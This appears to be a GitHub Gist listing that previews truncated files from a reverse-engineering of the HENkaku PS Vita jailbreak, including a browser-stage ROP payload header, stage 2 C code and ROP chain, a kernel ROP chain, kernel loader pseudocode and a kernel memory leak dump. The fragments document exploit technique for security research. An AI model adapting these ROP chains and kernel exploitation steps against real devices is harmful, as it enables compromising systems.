hexkyz / henkaku_index.html
Created Oct 19, 2016
HENkaku - Stage 1 (HTML code)
<script src='payload.js'></script>
<script>
var r, a, e, t, n, o, l, i, f, v, s, c;
var u, y, w, p, d, g, h, k, b;
var A, U;
var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/
m /= 4; /* 476 */
hexkyz / henkaku_payload_bin.txt
Created Oct 19, 2016
HENkaku - Stage 1 (JS payload)
[HEADER] (0x40 bytes)
0x524f507e -> ROP~
0x01000100 -> Version
0x00000000 -> NULL
0x00000000 -> NULL
0x00000730 -> No reloc
0x00000000 -> NULL
0x00000000 -> NULL
0x00000000 -> NULL
0x000003F8 -> No reloc
hexkyz / henkaku_stage3_krop.txt
Created Oct 19, 2016
HENkaku - Stage 3 (Kernel ROP)
// Kernel ROP chain
/*
scesysmem_base + 0x00000347
POP {PC}
*/
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031 // PC
/*
scesysmem_base + 0x00000031
POP {R0,PC}
hexkyz / henkaku_stage2.c
Last active Oct 19, 2016
HENkaku - Stage 2
// Copy SD card device path and param
strcpy(x_stack + 0x000086B4, "sdstor0:");
strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");
// Clear devctl 0x05 outbuf
// From x_stack + 0x00006F34 to x_stack + 0x00007334
memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);
// Copy dummy device path
strcpy(x_stack + 0x000086E4, "molecule0:");
hexkyz / henkaku_stage2_partial.c
Last active Oct 19, 2016
HENkaku - Stage 1 (Pre-analysis of stage 2)
strcpy(stack_base + 0x000086B4, "sdstor0:");
strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext");
// Do stuff
...
strcpy(stack_base + 0x000086E4, "molecule0:");
SceLibKernel_a4ad("molecule0:");
SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014);
hexkyz / henkaku_http_loader.c
Last active Oct 19, 2016
HENkaku - Stage 1 (HTTP loader)
// Do stuff
...
// Create a new thread for the second payload
int thread_id = sceKernelCreateThread("st2", SceWebkit_base + 0x000054C8, 0x10000100, 0x00600000, 0x00000000, 0x00000000, 0x00000000);
// Do stuff
...
// Construct the arguments for fetching the second payload
hexkyz / henkaku_stage3_pseudocode.c
Created Oct 19, 2016
HENkaku - Stage 3 (Pseudo-code)
// Allocate a new memory block
char* memblock_name = "Magic";
uint32_t memblock_type = 0x1020D006;
uint32_t memblock_size = 0xA0000;
void* memblock_opts = 0x00000000;
uint32_t memblock_id = kern_memblock_alloc(memblock_name, memblock_type, memblock_size, memblock_opts, 0);
// Retrieve the memory block's address into a buffer
uint32_t *out_buf;
kern_memblock_getaddr(memblock_id, out_buf);
hexkyz / henkaku_stage3_kxloader.c
Created Oct 19, 2016
HENkaku - Stage 3 (Kernel loader)
// Entry point
sub_00000010(scesysmem_base, payload_addr)
{
r4 = scesysmem_base
sub_00000356();
r5 = scesysmem_base >> 0x20
sub_0000035A();
// Decrypt and launch HENkaku's payload
hexkyz / henkaku_stage2_rop.txt
Created Oct 19, 2016
HENkaku - Stage 2 (ROP chain)
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1
0x00(x_stack + 0x00008A98) = 0x00000038
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571
0x00(x_stack + 0x00008AAC) = 0x00000000
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43
View sceIoDevctl_leak_1.50.txt
0x00000000: 00 02 20 9F 80 05 08 00 E0 59 00 00 97 11 49 00
0x00000010: A8 05 30 00 80 05 08 00 00 00 00 00 09 50 49 00
0x00000020: 00 C9 21 00 00 C9 21 00 C0 8B 21 00 80 A5 21 00
0x00000030: C0 8B 21 00 80 A5 21 00 00 B2 20 00 C0 65 20 00
0x00000040: 00 B2 20 00 C0 65 20 00 C0 65 20 00 C0 65 20 00
0x00000050: C0 65 20 00 C0 65 20 00 C0 21 20 00 C0 65 20 00
0x00000060: C0 21 20 00 C0 65 20 00 00 47 20 00 00 47 20 00
0x00000070: 00 47 20 00 00 47 20 00 C0 95 20 00 00 47 20 00
0x00000080: C0 95 20 00 00 47 20 00 40 0B 20 00 40 0B 20 00
0x00000090: 40 0B 20 00 40 0B 20 00 40 31 20 00 40 0B 20 00